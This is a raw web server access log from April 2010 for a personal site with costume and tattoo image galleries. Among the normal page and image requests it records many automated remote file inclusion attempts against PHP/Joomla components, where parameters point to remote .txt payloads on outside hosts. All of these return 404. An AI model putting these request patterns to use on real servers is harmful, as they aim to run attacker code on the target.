41.117.116.215 - - [09/Apr/2010:07:07:21 -0500] "GET /costume/costume86%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:22 -0500] "GET /costume/costume87%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:22 -0500] "GET /costume/costume88%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:23 -0500] "GET /costume/costume89%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:23 -0500] "GET /costume/costume91%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:23 -0500] "GET /costume/costume92%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:23 -0500] "GET /costume/costume93%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:24 -0500] "GET /costume/costume94%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:24 -0500] "GET /costume/costume95%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:07:25 -0500] "GET /costume/costume96%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
202.87.9.168 - - [09/Apr/2010:07:07:47 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:49 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.1" 200 47836 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:49 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.1" 200 43371 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:49 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.1" 200 49391 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:50 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.1" 200 50000 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:52 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:52 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.1" 200 46283 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:53 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.1" 200 50528 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:54 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:55 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:55 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:56 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:07:58 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
195.225.106.11 - - [09/Apr/2010:07:08:03 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:07:08:03 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:07:08:03 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
202.87.9.168 - - [09/Apr/2010:07:08:14 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
202.87.9.168 - - [09/Apr/2010:07:08:17 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.1" 200 155727 "http://tomdolan.pconline.com/costume/cd-page1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
41.117.116.215 - - [09/Apr/2010:07:09:33 -0500] "GET /costume/costume73%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:33 -0500] "GET /costume/costume74%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:34 -0500] "GET /costume/costume75%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:34 -0500] "GET /costume/costume76%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:35 -0500] "GET /costume/costume77%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:35 -0500] "GET /costume/costume78%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:36 -0500] "GET /costume/costume79%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:36 -0500] "GET /costume/costume81%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:36 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:36 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
41.117.116.215 - - [09/Apr/2010:07:09:37 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
115.89.243.90 - - [09/Apr/2010:07:09:41 -0500] "GET //components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:09:41 -0500] "GET /logs//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:09:41 -0500] "GET /logs/access_log.1239235200//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:09:42 -0500] "GET /logs/access_log.1238889600//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
74.50.85.15 - - [09/Apr/2010:07:12:13 -0500] "GET ///include/footer.php?_path[counter]=http://eventwerk24.de/da/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
74.50.85.15 - - [09/Apr/2010:07:12:13 -0500] "GET /logs///include/footer.php?_path[counter]=http://eventwerk24.de/da/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.50.85.15 - - [09/Apr/2010:07:12:13 -0500] "GET /logs/access_log.1253404800///include/footer.php?_path[counter]=http://eventwerk24.de/da/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:07:12:34 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:07:12:34 -0500] "GET /logs/access_log.1220054400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:07:12:34 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.50.85.15 - - [09/Apr/2010:07:12:46 -0500] "GET ///include/footer.php?_path[counter]=http://eventwerk24.de/templates/chocred/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
74.50.85.15 - - [09/Apr/2010:07:12:46 -0500] "GET /logs///include/footer.php?_path[counter]=http://eventwerk24.de/templates/chocred/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.50.85.15 - - [09/Apr/2010:07:12:46 -0500] "GET /logs/access_log.1253404800///include/footer.php?_path[counter]=http://eventwerk24.de/templates/chocred/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:07:13:06 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:07:13:06 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:07:13:06 -0500] "GET /logs/access_log.1220054400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:07:13:59 -0500] "GET /logs/access_log.1220054400/modules/My_eGallery/index.php?basepath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:14:32 -0500] "GET /logs/access_log.1238889600//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:14:32 -0500] "GET //components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:14:32 -0500] "GET /logs//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:14:58 -0500] "GET /logs/access_log.1237852800//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:16:38 -0500] "GET /logs/access_log.1237852800//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:16:38 -0500] "GET /logs//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:16:38 -0500] "GET //components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:09 -0500] "GET /logs/access_log.1253491200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:09 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:09 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:14 -0500] "GET /logs/access_log.1252627200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:18 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:18 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:18 -0500] "GET /logs/access_log.1253491200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:17:23 -0500] "GET /logs/access_log.1252627200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:18:15 -0500] "GET /logs//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:18:15 -0500] "GET //components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:18:15 -0500] "GET /logs/access_log.1223683200%20%20//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:18:32 -0500] "GET //components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:18:33 -0500] "GET /logs/access_log.1223683200//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
115.89.243.90 - - [09/Apr/2010:07:18:33 -0500] "GET /logs//components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
206.195.19.42 - - [09/Apr/2010:07:19:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&source=hp&q=vintage+tattoo+flash&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:09 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:10 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
174.129.228.250 - - [09/Apr/2010:07:19:32 -0500] "GET /logs/access_log.1216598400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:07:19:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:07:19:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
